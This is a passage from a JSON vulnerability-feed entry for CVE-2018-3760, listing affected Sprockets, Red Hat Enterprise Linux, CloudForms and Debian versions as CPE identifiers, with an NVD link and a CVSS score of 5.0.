"cpe:/a:sprockets_project:sprockets:3.7.1", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/a:redhat:cloudforms:4.5", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:redhat:enterprise_linux:7.0"], "id": "CVE-2018-3760", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta6:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.7:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:redhat:cloudforms:4.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:2.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta7:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.6:*:*:*:*:*:*:*"]}]}